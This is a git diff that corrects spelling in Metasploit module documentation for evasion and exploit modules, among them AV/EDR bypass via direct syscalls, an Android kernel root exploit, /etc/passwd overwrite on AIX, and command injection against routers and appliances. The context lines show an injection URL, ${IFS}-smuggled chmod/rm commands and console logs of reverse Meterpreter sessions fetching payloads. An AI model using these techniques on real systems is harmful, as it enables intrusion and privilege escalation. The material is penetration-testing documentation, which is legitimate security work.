https://docs.microsoft.com/en-us/dotnet/framework/app-domains/how-to-sign-an-assembly-with-a-strong-name) ## Verification Steps diff --git a/documentation/modules/evasion/windows/process_herpaderping.md b/documentation/modules/evasion/windows/process_herpaderping.md index d42d943f2049..2ecd52d2946b 100644 --- a/documentation/modules/evasion/windows/process_herpaderping.md 
+++ b/documentation/modules/evasion/windows/process_herpaderping.md @@ -64,7 +64,7 @@ removed automatically when the session is terminated or if an error occurs. ### REPLACED_WITH_FILE The file to replace the target with. If not set, the target file will be filled -with random bytes (WARNING! it is likely to be catched by AV). Windows +with random bytes (WARNING! it is likely to be caught by AV). Windows environment variables can be used in the path and the default is set to `%SystemRoot%\\System32\\calc.exe`. @@ -125,7 +125,7 @@ Module options (evasion/windows/process_herpaderping): ---- --------------- -------- ----------- ENCODER no A specific encoder to use (automatically selected if not set) FILENAME raU.exe yes Filename for the evasive file (default: random) - REPLACED_WITH_FILE %SystemRoot%\System32\calc.exe no File to replace the target with. If not set, the target file will be filled with random bytes (WARNING! it is likely to be catched by AV). + REPLACED_WITH_FILE %SystemRoot%\System32\calc.exe no File to replace the target with. If not set, the target file will be filled with random bytes (WARNING! it is likely to be caught by AV). WRITEABLE_DIR %TEMP% yes Where to write the loader on disk diff --git a/documentation/modules/evasion/windows/syscall_inject.md b/documentation/modules/evasion/windows/syscall_inject.md index 035480eb26e8..20de123f8d85 100644 --- a/documentation/modules/evasion/windows/syscall_inject.md +++ b/documentation/modules/evasion/windows/syscall_inject.md 
@@ -1,6 +1,6 @@ ## Description This module lets you create a Windows executable that injects a specific payload/shellcode in memory bypassing EDR/AVs Windows API hooking technique via direct syscalls achieved by Mingw's inline assembly.
-Mingw needs (x86_64) to be installed on the system and in the PATH enviroment variable.
+Mingw needs (x86_64) to be installed on the system and in the PATH environment variable.
 The technique used is based on Sorting by System Call Address, by enumerating all Zw* stubs in the EAT of NTDLL.dll and then sorting them by address, it still works even if syscall indices were overwritten by AVs. [For more details](https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/)
diff --git a/documentation/modules/exploit/aix/local/xorg_x11_server.md b/documentation/modules/exploit/aix/local/xorg_x11_server.md
index 5f1344cd8089..cead3a34a928 100644
--- a/documentation/modules/exploit/aix/local/xorg_x11_server.md
+++ b/documentation/modules/exploit/aix/local/xorg_x11_server.md
@@ -1,6 +1,6 @@ ## Description
-This module is a port of the OpenBSD X11 Xorg exploit to run on AIX. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user. The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when overwriting /etc/passwd.
+This module is a port of the OpenBSD X11 Xorg exploit to run on AIX. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user. The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, and is replaced by '-config', in conjunction with ANSI-C quotes to inject newlines when overwriting /etc/passwd.
 ## Vulnerable Application
diff --git a/documentation/modules/exploit/android/local/put_user_vroot.md b/documentation/modules/exploit/android/local/put_user_vroot.md
index 5e13daaf5db3..c36f6c0dad2c 100644
--- a/documentation/modules/exploit/android/local/put_user_vroot.md
+++ b/documentation/modules/exploit/android/local/put_user_vroot.md
@@ -1,10 +1,10 @@ ## Introduction
-This modules exploits a vulnerability in the linux kernel on an Android device, which allows an untrusted app to elevate to root priviledges. On Android an application normally runs as an individual linux user, sandboxing it from the Android system and other applications. After running the exploit the resulting session has full priviledge on the device, and can access the entire filesystem and the private data files of every other app, including system apps.
+This modules exploits a vulnerability in the linux kernel on an Android device, which allows an untrusted app to elevate to root privileges. On Android an application normally runs as an individual linux user, sandboxing it from the Android system and other applications. After running the exploit the resulting session has full privileges on the device, and can access the entire filesystem and the private data files of every other app, including system apps.
 The exploit uses a read kernel memory primitive to first figure out the correct offsets for the device, before using the write primitive to overwrite the ptmx.fsync handler to a function that will elevate the current process to root. Finally /dev/ptmx is opened, and fsync called to trigger the exploit.
-This exploit should work on any vulnerable device and is not device specific. In the example below a Samsung Galaxy S4 running Android version 4.3 was targetted.
+This exploit should work on any vulnerable device and is not device specific. In the example below a Samsung Galaxy S4 running Android version 4.3 was targeted.
 ## Usage
diff --git a/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md b/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md
index 0f46c22313d2..82ac01dfc7e9 100644
--- a/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md
+++ b/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md
@@ -67,7 +67,7 @@ The SNMP Community String to use (random string by default). ### ALLOWEDIP The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is
-tipically this host IP address, but can be different if your are in a NAT'ed
+typically this host IP address, but can be different if your are in a NAT'ed
 network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`.
@@ -93,7 +93,7 @@ Module options (exploit/freebsd/webapp/spamtitan_unauth_rce): Name Current Setting Required Description ---- --------------- -------- -----------
- ALLOWEDIP no The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is tipically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`.
+ ALLOWEDIP no The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is typically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`.
 COMMUNITY BTMlXXtt no The SNMP Community String to use (random string by default) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RETRIES 1 yes SNMP Retries
@@ -187,7 +187,7 @@ Module options (exploit/freebsd/webapp/spamtitan_unauth_rce): Name Current Setting Required Description ---- --------------- -------- -----------
- ALLOWEDIP no The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is tipically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`.
+ ALLOWEDIP no The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is typically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`.
 COMMUNITY BTMlXXtt no The SNMP Community String to use (random string by default) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RETRIES 1 yes SNMP Retries
@@ -271,7 +271,7 @@ Module options (exploit/freebsd/webapp/spamtitan_unauth_rce): Name Current Setting Required Description ---- --------------- -------- -----------
- ALLOWEDIP no The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is tipically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`.
+ ALLOWEDIP no The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is typically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`.
 COMMUNITY BTMlXXtt no The SNMP Community String to use (random string by default) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RETRIES 1 yes SNMP Retries
diff --git a/documentation/modules/exploit/linux/http/alienvault_exec.md b/documentation/modules/exploit/linux/http/alienvault_exec.md
index 1ed659c7bab4..6f9d5e9cc08f 100644
--- a/documentation/modules/exploit/linux/http/alienvault_exec.md
+++ b/documentation/modules/exploit/linux/http/alienvault_exec.md
@@ -48,7 +48,7 @@ msf exploit(alienvault_exec) > exploit [*] Activating the policy [+] Rogue policy activated [*] Triggering the policy by performing SSH login attempt
-[+] SSH - Failed authentication. That means our policy and action will be trigged..!
+[+] SSH - Failed authentication. That means our policy and action will be triggered..!
 [*] Sending stage (38500 bytes) to 12.0.0.137 [*] Meterpreter session 6 opened (12.0.0.1:4445 -> 12.0.0.137:51674) at 2017-01-31 14:13:49 +0300
diff --git a/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md b/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md
index 277ae10d3dcd..8ba14226ef47 100644
--- a/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md
+++ b/documentation/modules/exploit/linux/http/cisco_rv32x_rce.md
@@ -139,7 +139,7 @@ msf5 exploit(linux/http/cisco_rv32x_rce) > run [*] Using SSL connection to router. [*] Successfully downloaded config [*] Got MD5-Hash: dfead10390e560aea745ccba53e044ed
-[*] Loging in as user cisco using password hash.
+[*] Logging in as user cisco using password hash.
 [*] Using default auth_key 1964300002 [*] Successfully logged in as user cisco. [*] Got cookies: mlap=RGVmYXVsdDE6Ojo6Y2lzY28=;
diff --git a/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md b/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md
index bf22db35c2f9..323d8d77915a 100644
--- a/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md
+++ b/documentation/modules/exploit/linux/http/cpi_tararchive_upload.md
@@ -8,7 +8,7 @@ Cisco Prime Infrastructure releases prior to 3.4.1, 3.5, and 3.6, also EPN Manag ## Notes on Setup
-While developing the exploit, I happended to run into several issues that made the process more difficut. It was really because I didn't have the best hardware to work with, but in case you are trying to set up Cisco Prime Infrastructure as VMs like me, you may want to read this first.
+While developing the exploit, I happened to run into several issues that made the process more difficut. It was really because I didn't have the best hardware to work with, but in case you are trying to set up Cisco Prime Infrastructure as VMs like me, you may want to read this first.
 Special thanks to Steven Seeley (mr_me) for providing some of the most important setup notes himself.
diff --git a/documentation/modules/exploit/linux/http/denyall_waf_exec.md b/documentation/modules/exploit/linux/http/denyall_waf_exec.md
index c41efa6ae188..f33164803825 100644
--- a/documentation/modules/exploit/linux/http/denyall_waf_exec.md
+++ b/documentation/modules/exploit/linux/http/denyall_waf_exec.md
@@ -37,7 +37,7 @@ msf exploit(denyall_exec) > exploit [*] Started reverse TCP handler on 35.12.3.3:4444 [*] Extracting iToken value from unauthenticated accessible endpoint. [+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
-[*] Trigerring command injection vulnerability with iToken value.
+[*] Triggering command injection vulnerability with iToken value.
 [*] Sending stage (40411 bytes) to 35.176.123.128 [*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
diff --git a/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md b/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md
index 00a6947bb657..5f3ddaf25353 100644
--- a/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md
+++ b/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md
@@ -7,7 +7,7 @@ DLINK DWL-2600 WiFi Access Points contain an authenticated command injection vul ### HttpUsername Defaults to admin, this is the username that is used to authenticate to the device ### HttpPassword
-Defaults to admin, this is hte password that is used to authenticate to the device
+Defaults to admin, this is the password that is used to authenticate to the device
 ### DOWNHOST Alternative host to request MIPS payload from. ### DOWNFILE
diff --git a/documentation/modules/exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684.md b/documentation/modules/exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684.md
index ee9f10d0f26c..0e30496292a2 100644
--- a/documentation/modules/exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684.md
+++ b/documentation/modules/exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684.md
@@ -19,7 +19,7 @@ The following products are affected: ### Exploitation This module will abuse the authentication bypass vulnerability in the affected products to add a new ssh public
-key in the authorized keys of the target user (if no user is provied it'll try to detect it) and then connect
+key in the authorized keys of the targeted user (if no user is provided it'll try to detect it) and then connect
 over ssh to the target system (if no ssh private key is provided this module will automatically generate one). To do so it will add the following header in all HTTP requests:
@@ -55,7 +55,7 @@ The path to the Fotigate API (Default: `/`). ### USERNAME (required)
-The username of the targed user (Default: `admin`).
+The username of the target user (Default: `admin`).
 ### PRIVATE_KEY (optional)
@@ -72,7 +72,7 @@ The password for a given SSH private key (if it has one). ### SSH_RPORT (required)
-The SSH port to connnect to (Default: `22`)
+The SSH port to connect to (Default: `22`)
 ## Scenarios
diff --git a/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md b/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
index 5153193b803f..d4bd67d6365e 100644
--- a/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
+++ b/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
@@ -76,7 +76,7 @@ msf6 exploit(linux/http/froxlor_log_path_rce) > rexploit [+] CSRF token is : 5701b7e6335ab13e20e91845b210b6be0bea7621 [+] Changed logfile path to: /var/www/html/froxlor/templates/Froxlor/footer.html.twig [*] Using URL: http://172.16.199.1:8080/ygs3pAWMRNIs
-[+] Injected payload sucessfully
+[+] Injected payload successfully
 [*] Changing logfile path back to default value while triggering payload: /var/www/html/froxlor/logs/froxlor.log [*] Client 172.16.199.140 (Wget/1.20.3 (linux-gnu)) requested /ygs3pAWMRNIs [*] Sending payload to 172.16.199.140 (Wget/1.20.3 (linux-gnu))
diff --git a/documentation/modules/exploit/linux/http/goahead_ldpreload.md b/documentation/modules/exploit/linux/http/goahead_ldpreload.md
index 7f104754c3d5..e810d8accd95 100644
--- a/documentation/modules/exploit/linux/http/goahead_ldpreload.md
+++ b/documentation/modules/exploit/linux/http/goahead_ldpreload.md
@@ -7,7 +7,7 @@ ### Kali 2017.3 and Ubuntu 16.04 Install Instructions
-These instructions are based on the vulerability analysis by [elttam.com.au](https://www.elttam.com.au/blog/goahead/)
+These instructions are based on the vulnerability analysis by [elttam.com.au](https://www.elttam.com.au/blog/goahead/)
 ``` git clone https://github.com/embedthis/goahead.git
diff --git a/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md b/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
index 7e305e913a17..2a52483dd80a 100644
--- a/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
+++ b/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
@@ -58,7 +58,7 @@ Specifies base URI. The default value is `/`. ## Scenarios
-### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get Meterpreter session.
+### Grandstream UCM6202 IP PBX firmware version 1.0.18.13. Get Meterpreter session.
 ``` msf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
diff --git a/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md b/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
index 1a832beb93b1..b543d6eace49 100644
--- a/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
+++ b/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
@@ -133,7 +133,7 @@ Password:' [*] Received new reply token = 'Success ping result: HG520b>'
-[+] Command executed succesfully
+[+] Command executed successfully
 [*] Runninig command on target: chmod 777 /tmp/zjtmztfz [*] Received new reply token = 'p' [*] Received new reply token = 'ing ?;chmod${IFS}777${IFS}/tmp/zjtmztfz;trueping: bad address '?'
@@ -141,7 +141,7 @@ HG520b>' Success ping result: HG520b>'
-[+] Command executed succesfully
+[+] Command executed successfully
 [*] Runninig command on target: /tmp/zjtmztfz [*] Received new reply token = 'p' [*] Received new reply token = 'ing ?;/tmp/zjtmztfz&trueping: bad address '?'
@@ -149,7 +149,7 @@ HG520b>' Success ping result: HG520b>'
-[+] Command executed succesfully
+[+] Command executed successfully
 [*] Runninig command on target: rm /tmp/zjtmztfz [*] Received new reply token = 'p' [*] Received new reply token = 'ing ?;rm${IFS}/tmp/zjtmztfz;trueping: bad address '?'
@@ -157,7 +157,7 @@ HG520b>' Success ping result: HG520b>'
-[+] Command executed succesfully
+[+] Command executed successfully
 [*] Waiting for the payload to connect back .. [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 197.38.98.11:50097) at 2017-04-15 16:45:05 +0200 [+] Payload connected!
diff --git a/documentation/modules/exploit/linux/http/kaltura_unserialize_rce.md b/documentation/modules/exploit/linux/http/kaltura_unserialize_rce.md
index 042db08cf734..0dcdaf7a5839 100644
--- a/documentation/modules/exploit/linux/http/kaltura_unserialize_rce.md
+++ b/documentation/modules/exploit/linux/http/kaltura_unserialize_rce.md
@@ -112,7 +112,7 @@ Confirm passwd: "" Your time zone [see http://php.net/date.timezone], or press enter for [Europe/Amsterdam]: "" How would you like to name your system (this name will show as the From field in emails sent by the system) [Kaltura Video Platform]? "" Your website Contact Us URL [http://corp.kaltura.com/company/contact-us]: ""
-'Contact us' phone number [+1 800 871 5224]? ""
+'Contact us' phone number [+1 800 871 5224]? ""
 Is your Apache working with SSL?[Y/n] "" It is recommended that you do work using HTTPs. Would you like to continue anyway?[N/y] ""
diff --git a/documentation/modules/exploit/linux/http/lexmark_faxtrace_settings.md b/documentation/modules/exploit/linux/http/lexmark_faxtrace_settings.md
index a7128b44bd69..50a16f89afbb 100644
--- a/documentation/modules/exploit/linux/http/lexmark_faxtrace_settings.md
+++ b/documentation/modules/exploit/linux/http/lexmark_faxtrace_settings.md
@@ -9,7 +9,7 @@ used in an bash eval statement: `eval "$cmd" > /dev/null`, allowing for an unaut ### Installation Steps
-Testing of this module was preformed on a physical device. Emulating firmware through qemu or similar methods have not
+Testing of this module was performed on a physical device. Emulating firmware through qemu or similar methods have not
 been explored. ### Affected Models
diff --git a/documentation/modules/exploit/linux/http/microfocus_obr_cmd_injection.md b/documentation/modules/exploit/linux/http/microfocus_obr_cmd_injection.md
index 1397de8c12e7..12cc656810d8 100644
--- a/documentation/modules/exploit/linux/http/microfocus_obr_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/microfocus_obr_cmd_injection.md
@@ -12,7 +12,7 @@ Installation docs are available at: Vulnerable versions of the software can be downloaded from Micro Focus website by requesting a demo. This vulnerability only affects Linux installations.
-All details about this vulnerabilitu can be obtained from the advisory:
+All details about this vulnerability can be obtained from the advisory:
 * https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md
diff --git a/documentation/modules/exploit/linux/http/mobileiron_core_log4shell.md b/documentation/modules/exploit/linux/http/mobileiron_core_log4shell.md
index 9a087dab1436..27e7a1130629 100644
--- a/documentation/modules/exploit/linux/http/mobileiron_core_log4shell.md
+++ b/documentation/modules/exploit/linux/http/mobileiron_core_log4shell.md
@@ -30,7 +30,7 @@ so that I can hit it over the network. 15. Assign a static IP address and network mask that works with your test network. (e.g. `10.9.49.101` and `255.255.255.0`) 16. Enter your test networks default gateway (e.g. `10.9.49.1`) 17. Enter a fully-qualified domain name for the device (e.g. `lobster.example.com`). Unfortunately, this needs to work. I added a
-static DNS enty to my lab network's router.
+static DNS entry to my lab network's router.
 18. Enter your desired name server. My lab network relies on the aforementioned router (e.g. `10.9.49.1`) 19. Enter blank entries for name server 2 and 3. 20. `yes` to enable remote shell access (why not, right?)
diff --git a/documentation/modules/exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.md b/documentation/modules/exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.md
index 22e51af1d37e..90beded1b900 100644
--- a/documentation/modules/exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.md
@@ -280,7 +280,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run [+] The target appears to be vulnerable. [*] Uploading malicious 'check_ping' plugin... [*] Command Stager progress - 100.00% done (897/897 bytes)
-[!] For NagiosXi version 5.3.0 it may take serveral minutes for a session to open. If the module times out, try increasing the `WfsDelay` value.
+[!] For NagiosXi version 5.3.0 it may take several minutes for a session to open. If the module times out, try increasing the `WfsDelay` value.
 [+] Successfully uploaded plugin. [*] Executing plugin... [*] Waiting up to 300 seconds for the plugin to request the final payload...
diff --git a/documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md b/documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md
index 93e8f65346c7..c1c68d79711e 100644
--- a/documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md
+++ b/documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md
@@ -1,4 +1,4 @@
-The module netgear_dgn1000_setup_unauth_exec exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` fuction of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http:///setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/¤tsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload.
+The module netgear_dgn1000_setup_unauth_exec exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` function of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http:///setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/¤tsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload.
 ## Vulnerable Application
@@ -15,7 +15,7 @@ Netgear DGN1000 with firmware versions up to `1.1.00.48` and DGN2000v1 models ## Scenarios
-Sample output of a successfull exploitation should be look like this :
+Sample output of a successful exploitation should be look like this :
 ``` msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_exec
diff --git a/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md b/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md
index 005a477dbb26..8e5c102b50e2 100644
--- a/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md
+++ b/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md
@@ -60,7 +60,7 @@ msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > [+] New temporary user 6QpO8mLt created [+] Authenticated as user 6QpO8mLt [*] Command shell session 1 opened (1.1.1.2:4444 -> 1.1.1.1:34586) at 2020-03-10 22:26:46 +0100
-[+] Command sucessfully executed
+[+] Command successfully executed
 [*] User 6QpO8mLt removed successfully ! msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > sessions -i 1
diff --git a/documentation/modules/exploit/linux/http/samsung_srv_1670d_upload_exec.md b/documentation/modules/exploit/linux/http/samsung_srv_1670d_upload_exec.md
index ce5718cb4477..1b8c0829d919 100644
--- a/documentation/modules/exploit/linux/http/samsung_srv_1670d_upload_exec.md
+++ b/documentation/modules/exploit/linux/http/samsung_srv_1670d_upload_exec.md
@@ -38,7 +38,7 @@ network_ssl_upload.php: ``` To avoid the need of authentication, the exploit also takes advantage of another vulnerability
-(CVE-2015-8279) in the log exporting function to read an aribtrary file from the remote machine
+(CVE-2015-8279) in the log exporting function to read an arbitrary file from the remote machine
 in order to obtain credentials that can be used for the attack. ## Vulnerable Application
diff --git a/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md b/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md
index 631dda727385..893a2492b757 100644
--- a/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md
+++ b/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md
@@ -12,7 +12,7 @@ restriction, a wget input file is staged in /a, and executed to download our pay to /b. From there the payload is executed. A wfsdelay is required to give time for the payload to download, and the execution of it to run.
-A more detailed explination of exploitation steps:
+A more detailed explanation of exploitation steps:
 1. We first clean the env by deleting `/a`, and `b` 2. we use `echo -n` to append our IP:PORT for our staging server to `/a`. This is
diff --git a/documentation/modules/exploit/linux/http/totolink_unauth_rce_cve_2023_30013.md b/documentation/modules/exploit/linux/http/totolink_unauth_rce_cve_2023_30013.md
index 8c6d7947b45a..7d02a96fac38 100644
--- a/documentation/modules/exploit/linux/http/totolink_unauth_rce_cve_2023_30013.md
+++ b/documentation/modules/exploit/linux/http/totolink_unauth_rce_cve_2023_30013.md
@@ -43,7 +43,7 @@ This module has been tested on: * Download the vulnerable firmware from [TOTOLINK](https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/218/ids/36.html). * We need `X5000R_V9.1.0u.6118_B20201102.zip`. * Start emulation.
-* First run `./init.sh` to initialize and start the Postgress database.
+* First run `./init.sh` to initialize and start the Postgresql database.
 * Start a debug session `./run.sh -d TOTOLINK X5000R_V9.1.0u.6118_B20201102.zip`. * This will take a while, but in the end you should see the following...
diff --git a/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md b/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md
index 5fd47c1b72c4..5f9f96369f38 100644
--- a/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md
+++ b/documentation/modules/exploit/linux/http/trendmicro_imsva_widget_exec.md
@@ -52,7 +52,7 @@ msf exploit(trendmicro_imsva_widget_exec) > exploit [+] Awesome. JSESSIONID value = 0567E974AE729E58178C9B513FEBE41E [*] Initiating session with widget framework [+] Session with widget framework successfully initiated.
-[*] Trigerring command injection vulnerability
+[*] Triggering command injection vulnerability
 [*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.201:44103) at 2017-10-08 18:05:11 +0300 pwd
diff --git a/documentation/modules/exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md b/documentation/modules/exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md
index 5bbdfabdf01e..1123f65c15d2 100644
--- a/documentation/modules/exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md
+++ b/documentation/modules/exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md
@@ -21,7 +21,7 @@ Follow these instructions to install a vulnerable VMware NSX Manager on VirtualB * Note: You need to be a customer with valid VMware subscriptions * Download the ova file `VMware-NSX-Manager-6.4.13-19307994.ova` * Open VirtualBox and import the ova file
-* After sucessful import, start the VM and you have a VMware NSX Manager running which is accessible using url `https://`
+* After successful import, start the VM and you have a VMware NSX Manager running which is accessible using url `https://`
 * Credentials to login: user: `admin`, password: `default` * Use the module and options below to test the vulnerability...
diff --git a/documentation/modules/exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection.md b/documentation/modules/exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection.md
index 5eeb507e69a7..ace77343ae65 100644
--- a/documentation/modules/exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection.md
@@ -5,7 +5,7 @@ Western Digital MyCloud before 2.30.196 in order to achieve unauthenticated remo The module first performs a check to see if the target is WD MyCloud. If so, it attempts to trigger an authentication bypass (CVE-2018-17153) via a crafted GET request to /cgi-bin/network_mgr.cgi. If the server responds as expected (with a 404 response), the module assesses the vulnerability status by attempting to exploit
-a commend injection vulnerability (CVE-2016-10108) in order to print a random string via the echo command.
+a command injection vulnerability (CVE-2016-10108) in order to print a random string via the echo command.
 This is done via a crafted POST request to /web/google_analytics.php where the command is injected into the `arg` POST parameter. If the server is vulnerable, the same command injection vector is leveraged to execute the payload.
@@ -27,7 +27,7 @@ https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western- ## Installation Information Western Digital no longer seems to offer older firmware versions for download to non-customers.
-[This commnity post](https://community.wd.com/t/wd-my-cloud-v3-x-v4-x-and-v2-x-firmware-versions-download-links/148533)
+[This community post](https://community.wd.com/t/wd-my-cloud-v3-x-v4-x-and-v2-x-firmware-versions-download-links/148533)
 contains download links to older firmware versions as well as to the source code, but only the links to the source code still work. ## Verification Steps
diff --git a/documentation/modules/exploit/linux/http/xplico_exec.md b/documentation/modules/exploit/linux/http/xplico_exec.md
index cf1192201147..fc5093ccf246 100644
--- a/documentation/modules/exploit/linux/http/xplico_exec.md
+++ b/documentation/modules/exploit/linux/http/xplico_exec.md
@@ -4,11 +4,11 @@ This module exploits command injection vulnerability. Unauthenticated users can The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try -to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation. +to send e-mail that contains activation code. Unfortunately, this e-mail probably not gonna reach to the given e-mail address on most of installation. But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage. One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum -of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without 